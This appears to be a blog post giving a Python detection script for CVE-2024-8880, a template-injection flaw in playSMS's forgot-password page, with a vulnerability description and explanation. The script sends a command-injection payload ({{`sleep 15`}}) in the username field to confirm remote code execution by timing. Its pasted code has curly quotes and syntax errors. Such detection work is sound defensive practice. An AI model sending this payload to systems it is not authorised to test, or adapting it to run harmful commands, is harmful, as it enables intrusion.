- import argparse
- import requests
- import re
- import urllib3
- # Disable SSL verification warning for simplicity
- urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
- def validate_url(url):
- if not url.startswith(“http://”) and not url.startswith(“https://”)
- raise ValueError(“Invalid URL schema. Use ‘http://’ or ‘https://'.")
- def get_csrf(session, url):
- try:
- response = session.get(url, timeout = 10, verify = False)
- if response.status_code == 200:
- return extract_csrf(response.text)
- return None
- except requests.RequestException as e:
- print(f”[-] Request failed: {e}”)
- return None
- def extract_csrf(body):
- match = re.search(r’name=”X-CSRF-Token” value=”([a-z0–9]+)”’, body)
- if match:
- return match.group(1)
- return None
- def scan(url):
- session = requests.Session()
- csrf = get_csrf(session, f”{url}/index.php?app=main&inc=core_auth&route=forgot”)
- if not csrf:
- print(“[-] The playSMS instance seems NOT to be vulnerable to CVE-2024–8880.”)
- return
- url = f”{url}/index.php?app=main&inc=core_auth&route=forgot&op=forgot”
- try:
- response = requests.post(url,
- data = {
- “X-CSRF-Token”: csrf,
- “username”: “{{`sleep 15`}}”,
- “email”: “”,
- “captcha”: “”
- }, timeout = 30, verify = False)
- if response.status_code == 200 and response.elapsed.total_seconds() >= 15:
- print(“[+] The playSMS instance seems to be vulnerable to CVE-2024–8880.”)
- return
- except requests.RequestException as e:
- print(f”[-] LOG: An error occurred during the scanning: {e}”)
- print(“[-] The playSMS instance seems NOT to be vulnerable to CVE-2024–8880.”)
- def main():
- parser = argparse.ArgumentParser(description=”Detection script for CVE-2024–8880.”)
- parser.add_argument(“ — url”, required = True, help = “URL to send requests to.”)
- args = parser.parse_args()
- validate_url(args.url)
- scan(args.url.rstrip(“/”))
- if __name__ == “__main__”:
- main()
Description
Introduction
A vulnerability classified as critical has been found in playSMS 1.4.4/1.4.5/1.4.6/1.4.7. Affected is an unknown function of the file /playsms/index.php?app=main&inc=core_auth&route=forgot&op=forgot of the component Template Handler. The manipulation of the argument username/email/captcha leads to code injection. It is possible to launch the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. It is recommended to upgrade the affected component. The project maintainer was informed early about the issue. Investigation shows that playSMS up to 1.4.3 contained a fix but later versions re-introduced the flaw. As long as the latest version of the playsms/tpl package is used, the software is not affected. Version >=1.4.4 shall fix this issue for sure.
Reference: https://nvd.nist.gov/vuln/detail/CVE-2024-8880
Detection Script Usage
kali@kali:/tmp$ python3 detection.py -h
usage: detection.py [-h] --url URL
Detection script for CVE-2024-8880.
options:
-h, --help show this help message and exit
--url URL URL to send requests to.
kali@kali:/tmp$Detecting Vulnerable Targets
python3 detection.py --url http://playsms.localUnderstanding detection script
The detection script works as follows:
- Read user input (the URL to target).
- The supplied URL is then validated.
- If the URL is valid, it is passed to the
scan()function. - Next, the CSRF token is fetched from the page by sending a GET request.
- Once the CSRF token is retrieved, a POST request is sent to
/index.php?app=main&inc=core_auth&route=forgot&op=forgot. In the submitted request, theusernameparameter contains the SSTI payload{{`sleep 15`}}which executes thesleep 15command (Unix) - a sleep for 15 seconds. Thus the output would be delayed by 15 seconds (plus some network delay) if the target is vulnerable. - If the CSRF isn’t retrieved or the response status isn’t 200, or the response delay is less than 15 seconds, the target is reported to be potentially NOT vulnerable.
- Else the target is reported as potentially vulnerable.
